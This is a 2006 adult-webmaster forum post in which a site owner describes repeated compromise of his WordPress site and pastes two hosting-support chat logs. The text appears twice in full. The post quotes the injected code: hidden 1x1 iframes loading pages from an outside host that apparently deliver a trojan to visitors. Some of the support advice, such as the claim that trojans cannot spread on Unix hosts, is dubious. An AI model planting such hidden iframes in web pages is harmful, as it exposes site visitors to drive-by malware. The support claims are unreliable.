GoFuckYourself.com - Adult Webmaster Forum - View Single Post - Responce (part 2 of): I keep getting hacked...

RobV · 10-02-2006, 08:54 PM

This is in continuation from my orginal post:
http://www.gfy.com/fucking-around-and-business-discussion/660506-getting-hacked-2.html

I had to end up deleting everything from the server and reinstall, but again I was ONLY running WP.

So I decide to turn off my computers, shut everything down, and take a little trip: I went to my house in Arizona for the weekend, I come back and It is hacked again.

This time I have different code embeded at the top:

Here is the first conversation:
Monday, October 02, 2006 5:19:24 PM (10/2/2006 9:19:24 PM - GMT)

Powered by SightMax.

Welcome to Webair, Alex will be right with you.

Alex:
hello ,how may i hel pyou?

Rob:
yeah I need a lot of help.

Rob:
my website has been comprimised and I was wondering if you could assist me in finding a soultion?

Alex:
what site?

Rob:
www.howgay.com

Alex:
in what way was it compromised?

Alex:
is there a ticket # on this?

Rob:
no ticket number, every day or other day.....code is being inserted into the header portion. its a trojan.

Rob:
the code in there at the moment is

Rob:
:

Rob:
<iframe src='http://megacount.net/adv/066/new.php' width=1 height=1></iframe>
<iframe src='http://megacount.net/adv/new.php?adv=66' width=1 height=1></iframe>

Rob:
I was told ::

Rob:
Here's a little suggestion to see what is running in the background: I'm pressuming this malicious script is being called by a cron job so log in by ssh with your root password and type in crontab -l See what is running in the background

Rob:
because i have a rootkit on the server?

Alex:
i l lcheck cron

Rob:
anything

Rob:
?

Alex:
sorry still working on it

Rob:
oh cool, I dont mean to bother you. sorry

Rob:
?

Alex:
almost done checking

Rob:
okay cool thanks again

Alex:
thereis no crontabls for that user

Alex:
we suggest upgrading all the scripts to the latest version which is most probably the reason of compromises

Rob:
i only run wordpress

Rob:
its the most up to date one

Alex:
<iframe src='http://megacount.net/adv/066/new.php' width=1 height=1></iframe>
<iframe src='http://megacount.net/adv/new.php?adv=66' width=1 height=1></iframe>

Alex:
whereis the code ?

Rob:
on the very top

Rob:
of the index page

Alex:
a senior tech will be able to take a look at thi issue in 5-10 minutes.

Alex:
please dont remove it

Alex:
keep the page as it is

Rob:
okay, how will i get an update?

Alex:
i will create a ticket on this on your behalf and you ll get an email

Rob:
okay

Rob:
cool

Rob:
so ill just sit tight

Rob:
have a good day

Visitor Rob has ended the chat

Then my second conversation after hours of no responce:
Adrian
Hi, how may i help?
RobV
yeah adrian, i was tlaking to you earlier about my hacked website.
Adrian
the exploit is not on our side
RobV
and is there any record of when it was changed? or anything?
Adrian
one moment
Adrian
where on the site does it show its hacked
RobV
on the main page
RobV
there is embeded code
RobV
and when you visit the site
RobV
it tries to load a trojan
Adrian
i believe the problem lies in your computer at home
Adrian
it might have gotten to the server through an upload
Adrian
trojans don't spread on virtual unix systems
RobV
i had my computers off all weekend for this specific reason
Adrian
i'm on a unix machine and when i pull up the site thats all i see, the site
Adrian
get some good antivirus software, i recommend an updated Norton Antivirus and completely download all the content and scan your computer

And thats where I sit, NOTHING NEW, NOTHING SOLVED.
and yes - I already have the most up to date Norton software, everything has been scanned and double checked. BUT MORE IMPORTANTLY - my "infected computer at home" wasn't on or I have not accessed my server SINCE everything was "fixed" Also it only happens to this site folder, my other domains and other sites are not infected (and yes I have been working on them and uploading), weird?

10-02-2006, 08:54 PM
RobV Confirmed User Join Date: Oct 2005 Posts: 111	Responce (part 2 of): I keep getting hacked... This is in continuation from my orginal post: http://www.gfy.com/fucking-around-and-business-discussion/660506-getting-hacked-2.html I had to end up deleting everything from the server and reinstall, but again I was ONLY running WP. So I decide to turn off my computers, shut everything down, and take a little trip: I went to my house in Arizona for the weekend, I come back and It is hacked again. This time I have different code embeded at the top: Here is the first conversation: Monday, October 02, 2006 5:19:24 PM (10/2/2006 9:19:24 PM - GMT) Powered by SightMax. Welcome to Webair, Alex will be right with you. Alex: hello ,how may i hel pyou? Rob: yeah I need a lot of help. Rob: my website has been comprimised and I was wondering if you could assist me in finding a soultion? Alex: what site? Rob: www.howgay.com Alex: in what way was it compromised? Alex: is there a ticket # on this? Rob: no ticket number, every day or other day.....code is being inserted into the header portion. its a trojan. Rob: the code in there at the moment is Rob: : Rob: <iframe src='http://megacount.net/adv/066/new.php' width=1 height=1></iframe> <iframe src='http://megacount.net/adv/new.php?adv=66' width=1 height=1></iframe> Rob: I was told :: Rob: Here's a little suggestion to see what is running in the background: I'm pressuming this malicious script is being called by a cron job so log in by ssh with your root password and type in crontab -l See what is running in the background Rob: because i have a rootkit on the server? Alex: i l lcheck cron Rob: anything Rob: ? Alex: sorry still working on it Rob: oh cool, I dont mean to bother you. sorry Rob: ? Alex: almost done checking Rob: okay cool thanks again Alex: thereis no crontabls for that user Alex: we suggest upgrading all the scripts to the latest version which is most probably the reason of compromises Rob: i only run wordpress Rob: its the most up to date one Alex: <iframe src='http://megacount.net/adv/066/new.php' width=1 height=1></iframe> <iframe src='http://megacount.net/adv/new.php?adv=66' width=1 height=1></iframe> Alex: whereis the code ? Rob: on the very top Rob: of the index page Alex: a senior tech will be able to take a look at thi issue in 5-10 minutes. Alex: please dont remove it Alex: keep the page as it is Rob: okay, how will i get an update? Alex: i will create a ticket on this on your behalf and you ll get an email Rob: okay Rob: cool Rob: so ill just sit tight Rob: have a good day Visitor Rob has ended the chat Then my second conversation after hours of no responce: Adrian Hi, how may i help? RobV yeah adrian, i was tlaking to you earlier about my hacked website. Adrian the exploit is not on our side RobV and is there any record of when it was changed? or anything? Adrian one moment Adrian where on the site does it show its hacked RobV on the main page RobV there is embeded code RobV and when you visit the site RobV it tries to load a trojan Adrian i believe the problem lies in your computer at home Adrian it might have gotten to the server through an upload Adrian trojans don't spread on virtual unix systems RobV i had my computers off all weekend for this specific reason Adrian i'm on a unix machine and when i pull up the site thats all i see, the site Adrian get some good antivirus software, i recommend an updated Norton Antivirus and completely download all the content and scan your computer And thats where I sit, NOTHING NEW, NOTHING SOLVED. and yes - I already have the most up to date Norton software, everything has been scanned and double checked. BUT MORE IMPORTANTLY - my "infected computer at home" wasn't on or I have not accessed my server SINCE everything was "fixed" Also it only happens to this site folder, my other domains and other sites are not infected (and yes I have been working on them and uploading), weird? __________________ ICQ: 619221